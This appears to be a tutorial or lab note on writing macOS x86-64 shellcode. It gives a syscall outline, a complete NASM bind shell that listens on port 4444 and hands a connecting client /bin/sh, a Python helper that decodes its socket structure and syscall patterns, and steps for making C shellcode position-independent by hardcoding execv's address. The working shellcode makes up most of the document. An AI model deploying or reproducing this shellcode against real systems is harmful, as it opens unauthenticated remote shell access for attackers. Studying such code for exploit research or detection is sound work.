
Bind Shell

Outline of the bind shell in C, as the sequence of calls it makes:

socket(2, 1, 0)
reserve space for sockaddr_in:
    sin_len = 0 (1 byte)
    sin_family = 2 (1 byte)
    sin_port = 4444 / 0x115c (2 bytes)
    sin_addr.s_addr = 0 (4 bytes)
    sin_zero[8] = 0 (8 bytes)
bind(socket, &addr, 0x10)
listen(socket, 0)
accept(socket, 0, 0)
dup2(accept, i)
execve("/bin/sh", 0, 0)

 

Final (x86-64 macOS, NASM syntax; every BSD syscall number gets the 0x2000000 class bit set via `bts rax, 25`):

```nasm
bits 64
global _main

_main:
    ; socket(AF_INET = 2, SOCK_STREAM = 1, 0)
    xor rsi, rsi
    mov rdx, rsi
    inc rsi
    mov rdi, rsi
    inc rdi
    push 0x61
    pop rax
    bts rax, 25             ; rax = 0x2000061 (BSD syscall class)
    syscall
    mov r10, rax            ; keep the listening socket in r10

    ; bind(sock, &sockaddr_in, 0x10)
    mov rdi, r10
    push 0x10
    pop rdx
    xor rsi, rsi
    push rsi                ; sin_zero[8] = 0
    mov esi, 0x5c110200     ; little-endian: sin_len=0, sin_family=2, sin_port=0x115c (4444), sin_addr=0
    push rsi
    push rsp
    pop rsi                 ; rsi = address of the 16-byte struct on the stack
    push 0x68
    pop rax
    bts rax, 25
    syscall

    ; listen(sock, 0)
    mov rdi, r10
    xor rsi, rsi
    push 0x6a
    pop rax
    bts rax, 25
    syscall

    ; accept(sock, 0, 0)
    mov rdi, r10
    xor rsi, rsi
    xor rdx, rdx
    push 0x1e
    pop rax
    bts rax, 25
    syscall
    mov r10, rax            ; r10 = accepted client socket

    ; dup2(client, i) for i = 2, 1, 0: stdin, stdout and stderr onto the socket
    mov rdi, r10
    push 0x2
    pop rsi
loop:
    push 0x5a
    pop rax
    bts rax, 25
    syscall                 ; rsi survives the syscall, so it serves as the counter
    dec rsi
    jns loop

    ; execve("/bin//sh", 0, 0); the double slash pads the path to 8 bytes without a NUL
    xor rdx, rdx
    mov rdi, '/bin//sh'
    push rdx                ; NUL terminator
    push rdi
    mov rdi, rsp            ; rdi = pointer to the path on the stack
    xor rsi, rsi
    push 0x3b
    pop rax
    bts rax, 25
    syscall
```
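The following Python is an added analysis example, not part of the original notes: it reconstructs the sockaddr_in that the assembly builds on the stack from the immediate 0x5c110200, and locates the `push imm8; pop rax; bts rax,25; syscall` idiom in a byte string so the BSD syscalls it invokes can be named. The sample bytes are constructed here by hand-encoding the socket() and bind() entry from the listing above.

```python
import struct

# macOS (XNU) BSD syscall numbers used in the shellcode above; `bts rax,25`
# sets the 0x2000000 BSD-class bit on top of these.
BSD_CLASS = 1 << 25
SYSCALL_NAMES = {0x61: "socket", 0x68: "bind", 0x6a: "listen",
                 0x1e: "accept", 0x5a: "dup2", 0x3b: "execve"}

def pack_sockaddr_in(port: int, addr: int = 0) -> bytes:
    """16-byte BSD sockaddr_in: sin_len, sin_family=AF_INET, sin_port
    (network byte order), sin_addr, sin_zero[8]."""
    return struct.pack(">BBHI", 0, 2, port, addr) + bytes(8)

def stack_image(imm32: int) -> bytes:
    """The 16 bytes the assembly leaves at rsp: `mov esi, imm32` zero-extends,
    `push rsi` stores it little-endian, and the earlier `push rsi` (rsi=0)
    sits above it as sin_zero. 0x5c110200 therefore lands as 00 02 11 5c."""
    return struct.pack("<Q", imm32) + struct.pack("<Q", 0)

def decode_sockaddr_in(buf: bytes) -> dict:
    sin_len, sin_family, sin_port, sin_addr = struct.unpack(">BBHI", buf[:8])
    return {"sin_len": sin_len, "sin_family": sin_family,
            "sin_port": sin_port, "sin_addr": sin_addr, "sin_zero": buf[8:16]}

def find_bsd_syscalls(blob: bytes) -> list:
    """Locate the `push imm8; pop rax; bts rax,25; syscall` idiom
    (6A ib 58 48 0F BA E8 19 0F 05) and name each syscall it invokes."""
    tail = bytes.fromhex("58480fbae8190f05")   # pop rax; bts rax,25; syscall
    hits, i = [], blob.find(tail)
    while i != -1:
        if i >= 2 and blob[i - 2] == 0x6a:      # preceded by push imm8
            num = blob[i - 1]
            hits.append((i - 2, SYSCALL_NAMES.get(num, "bsd#%d" % num)))
        i = blob.find(tail, i + 1)
    return hits

# Constructed sample: the socket() prologue and the bind() entry from the
# listing, hand-encoded (xor rsi,rsi; mov rdx,rsi; inc rsi; mov rdi,rsi;
# inc rdi; push 0x61; pop rax; bts rax,25; syscall; mov r10,rax; push 0x68 ...).
SAMPLE = bytes.fromhex(
    "4831f6 4889f2 48ffc6 4889f7 48ffc7"
    "6a61 58 480fbae819 0f05"
    "4989c2"
    "6a68 58 480fbae819 0f05")

if __name__ == "__main__":
    print(decode_sockaddr_in(stack_image(0x5c110200)))
    print(find_bsd_syscalls(SAMPLE))
```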

 

Examine the shellcode: 

 

 

Write shellcode in C 

The C version hardcodes function addresses.

gcc output is more usable for shellcode than clang output.

Position-independent code (PIC) here means not referencing variables or data outside the code segment.

`lea rdi, [rip+0x2c]` and `call 0x7 <dyld_stub_binder+0x100003f86>` are problematic: both reference addresses outside the code segment (the string literal and the dynamic-linker stub, respectively).

Use `char b[] = {'/','b','i','n','/','b','a','s','h',0};` in place of `"/bin/bash"`, so the string is built on the stack inside the function instead of being referenced from another section.

One issue is resolved. We still need to eliminate the call into the _stub section.

Make a definition for execv and specify its address manually: define a function-pointer type matching execv, create a variable of that type, and cast an arbitrary memory address into it as a placeholder for the execv address.

No call into the _stub section any more.

Print the address of execv, then hardcode it in the code.

Fixed.